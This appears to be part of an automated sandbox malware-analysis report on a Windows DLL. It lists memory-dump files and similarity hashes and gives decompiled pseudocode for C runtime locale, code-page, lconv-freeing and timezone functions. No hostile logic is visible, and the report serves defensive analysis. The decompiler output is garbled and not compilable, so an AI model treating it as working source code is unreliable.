Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: eadb42586a7c5940677c49ba3061e29f1b919af7b25f083e2cde2cc5759823a8
Instruction ID: 36f47d71b82abcd8cfb59cdb94b454e6dda5e54998b2f08da7bc3d820523ffb6
Opcode Fuzzy Hash: eadb42586a7c5940677c49ba3061e29f1b919af7b25f083e2cde2cc5759823a8
Instruction Fuzzy Hash: 54E0D837EE962177DB517B644502B3CA2506B40718F630089F2419F6C0CFB0880143E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DE2E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6DE2E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6de1e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6DE1D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6DE1D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6de1e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6de42f04; // 0x17
					E6DE2E68F(0, " )�mU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6de1e03b
					E6DE2E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6de1e03b
						E6DE2E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6de1e03b
						E6DE2E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6de42dec; // 0x41
						_t77 = E6DE2E68F(_t99, "t!�mE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6DE2E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6DDEF8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6DE245D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6DE35124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6DE2E112(_t92, _t99,  &_v20);
						} else {
							E6DE2E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6DE2E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6DE2E853
IsValidLocale.KERNEL32(?,00000001), ref: 6DE2E862
GetLocaleInfoW.KERNEL32(?,00001001,;m,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6DE2E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6DE2E8C9

Strings

t!mE, xrefs: 6DE2E7A5
)mU, xrefs: 6DE2E751
;m, xrefs: 6DE2E702, 6DE2E8A1
;m, xrefs: 6DE2E715, 6DE2E725, 6DE2E7E5, 6DE2E787, 6DE2E77C, 6DE2E77F, 6DE2E78A, 6DE2E7E8
;m, xrefs: 6DE2E7CE, 6DE2E7C3, 6DE2E821

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )mU$;m$;m$;m$t!mE
API String ID: 745075371-469580627
Opcode ID: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction ID: 26e71a0ce192d37410f522384ce4e92545f2799d156fb9948d837542c5888052
Opcode Fuzzy Hash: 58661702ba643eda020379749338115409e1dfcd7831f36db701fc7a144c78de
Instruction Fuzzy Hash: 54517572900A2AABEF14DFB5CC44ABE77B8FF45B04F254029E664EB240DF709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6DE2DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6DE1D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6DE2DD27(" )�mU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6DE2D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6DE2D775();
					} else {
						E6DE2D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6DE2DD27("t!�mE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6DE2D775();
							} else {
								E6DE2D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6DE2DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6de1e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6DE2D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6DE12188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6de9506c; // 0x657f4f7b
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6DE1D5FF(_t89, _t100, _t116);
								_t122 =  *(E6DE1D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6DE2E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6DE2806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6DE2E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6DDEF8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6DE24323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6DE24323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6DE37BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6DE24323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6DE37BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6DE35124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DE1E042,?,?,?,?,6DE1DA1E,?,00000004), ref: 6DE2DE78
_wcschr.LIBVCRUNTIME ref: 6DE2DF08
_wcschr.LIBVCRUNTIME ref: 6DE2DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,Bm,00000000,?), ref: 6DE2DFB9

Strings

t!mE, xrefs: 6DE2DE09
)mU, xrefs: 6DE2DDD4
Bm, xrefs: 6DE2DE8F, 6DE2DED7, 6DE2DF7F

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )mU$Bm$t!mE
API String ID: 4212172061-4093402219
Opcode ID: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction ID: fca5fd93ebc67425c94dae02697d5b0b382bef76f01ec8e2ddcbbe6c23e9e401
Opcode Fuzzy Hash: a8b7fce2440edd47fa963f4898941171e53fa054f4b0256480d0f60490f7f6fa
Instruction Fuzzy Hash: 06612939604207AAE7159B34CC85BBA73A8EF85718F22446EEB18D7280FF74E541C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE2E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6de2e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6de42f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6de42f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6DE1BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6de2e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5DA
GetACP.KERNEL32(?,?,6DE2E837,?,00000000), ref: 6DE2E5EF

Strings

ACP, xrefs: 6DE2E536
7m, xrefs: 6DE2E5CF, 6DE2E5A6
OCP, xrefs: 6DE2E56C

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: 7m$ACP$OCP
API String ID: 2299586839-3422903688
Opcode ID: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction ID: f0b70e353e2ab9763577518776d02c514cf4d3ba61bd457234b3c8c4f7c0a98b
Opcode Fuzzy Hash: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction Fuzzy Hash: 2221B5226E492696D7248F74C901BA777B6BF45F18B728424E905E7300FF32DD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6de950b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6DE1CBD3(_t46);
							E6DE2C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6DE1CBD3(_t47);
							E6DE2CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6DE1CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6DE1CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6DE2C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6de952b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6DE1CBD3(_t31);
							E6DE1CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6DE1CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6DE1CBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6DE2BFA8

Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7EC
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C7FE
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C810
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C822
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C834
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C846
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C858
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C86A
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C87C
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C88E
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8A0
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8B2
Part of subcall function 6DE2C7CF: _free.LIBCMT ref: 6DE2C8C4

_free.LIBCMT ref: 6DE2BF9D

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2BFBF
_free.LIBCMT ref: 6DE2BFD4
_free.LIBCMT ref: 6DE2BFDF
_free.LIBCMT ref: 6DE2C001
_free.LIBCMT ref: 6DE2C014
_free.LIBCMT ref: 6DE2C022
_free.LIBCMT ref: 6DE2C02D
_free.LIBCMT ref: 6DE2C065
_free.LIBCMT ref: 6DE2C06C
_free.LIBCMT ref: 6DE2C089
_free.LIBCMT ref: 6DE2C0A1

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction ID: c258c08bf26d04b448ed377935d82c122569170a8f62c4328a88371dc3493123
Opcode Fuzzy Hash: d52aa74de3377c90392bc2e9f4b894d72393686db59f321cb1bb3421556c863d
Instruction Fuzzy Hash: 6D311B31B092069FEB219A35DC84FAAB3F9AF0075CF31482DE568E7651DF71E9908B50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DE2877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6DE2822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6DE28289( &_v8) != 0 || E6DE28231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6DE2822B();
					_t32 =  &_v52; // 0x6de42130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6DE28289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6DE12188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6de9506c; // 0x657f4f7b
						_v100 = _t74 ^ _t192;
						 *0x6de95384 =  *0x6de95384 | 0xffffffff;
						 *0x6de95378 =  *0x6de95378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6de97a10 = 0;
						_t78 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6de42130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6DE1F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6DE21216(0x6de42130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6de42130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6DE1CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6DE1CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6DE2877C(0x6de42130, _t172, __eflags);
							}
						}
						E6DE1CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6DDEF8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6DE28231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6DE2825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
